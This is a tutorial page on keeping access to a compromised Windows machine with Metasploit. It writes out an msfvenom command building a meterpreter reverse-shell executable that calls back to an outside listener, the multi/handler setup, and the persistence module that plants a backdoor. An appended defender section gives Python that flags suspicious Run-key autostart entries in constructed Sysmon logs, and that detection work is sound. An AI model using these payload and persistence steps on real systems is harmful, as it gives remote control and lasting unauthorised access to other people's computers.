Persistence

Metasploit

Use msfvenom to create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exe

  • Upload the file to the victim machine

  • Start msfconsole

  • Execute:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

Run listener

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461

  • Execute lashe.exe (our payload) on the victim machine

  • We obtain the shell:

Background session

meterpreter > background
[*] Backgrounding session 1...

Use persistence module

msf exploit(multi/handler) > use exploit/windows/local/persistence
msf exploit(windows/local/persistence) >

Set background session

msf exploit(windows/local/persistence) > set session 1

Run persistence

If the system is shut down or reset for whatever reason, you will lose your Meterpreter session. By using the persistence module, however, you create a backdoor into the system which you can access at any time using the Metasploit multi handler with the payload set to windows/meterpreter/reverse_tcp. This lets you send another Meterpreter payload to the machine and open a new Meterpreter session.
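For defenders, an added example that is not part of the original page: the persistence module is documented as starting its payload at logon or boot through a value under the registry's CurrentVersion\Run key, so the code below scans registry value-set events for Run-key entries that point at scripts or temp directories. The log lines are constructed, and the pipe-delimited export format, the field layout and the suspicious-path heuristic are assumptions of this example.

```python
import re

# Value written directly under ...\CurrentVersion\Run or RunOnce (HKLM or a user hive).
RUN_KEY = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\[^\\]+$", re.I)
# Heuristic (assumption of this example): script files or user-writable staging dirs.
SUSPICIOUS = re.compile(
    r"\\appdata\\local\\temp\\|\\windows\\temp\\|\\users\\public\\|%temp%"
    r"|\.(vbs|js|ps1|bat)\b", re.I)

# Constructed sample events in an assumed pipe-delimited export of Sysmon fields.
SAMPLE_EVENTS = [
    r"EventID=13|UtcTime=2024-01-15 09:12:44.101|Image=C:\Windows\explorer.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive|Details=C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    r"EventID=13|UtcTime=2024-01-15 09:14:02.517|Image=C:\Users\alice\Downloads\example.exe|TargetObject=HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\example|Details=C:\Users\alice\AppData\Local\Temp\example.vbs",
    r"EventID=13|UtcTime=2024-01-15 09:15:30.009|Image=C:\Windows\System32\svchost.exe|TargetObject=HKLM\SOFTWARE\Example\Settings\CachePath|Details=C:\Windows\Temp\cache",
    r"EventID=13|UtcTime=2024-01-15 09:16:11.733|Image=C:\Users\alice\Downloads\example.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svc-example|Details=C:\Windows\Temp\svc-example.exe",
    r"EventID=1|UtcTime=2024-01-15 09:17:00.000|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c dir",
]

def parse_event(line):
    """Split one 'Key=Value|Key=Value' line into a dict of fields."""
    return dict(f.split("=", 1) for f in line.strip().split("|") if "=" in f)

def flag_run_key_persistence(lines):
    """Return registry value-set events that add a suspicious autostart entry."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13":  # 13 = Sysmon RegistryEvent (Value Set)
            continue
        target, details = ev.get("TargetObject", ""), ev.get("Details", "")
        # Both conditions must hold: an autostart location AND a suspicious target.
        if RUN_KEY.search(target) and SUSPICIOUS.search(details):
            findings.append({"time": ev.get("UtcTime"), "writer": ev.get("Image"),
                             "value": target.rsplit("\\", 1)[-1], "command": details})
    return findings

if __name__ == "__main__":
    for hit in flag_run_key_persistence(SAMPLE_EVENTS):
        print(hit)
```

The benign OneDrive autostart and the temp-path write outside the Run key are both ignored; only the two Run-key values pointing into temp directories are reported.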
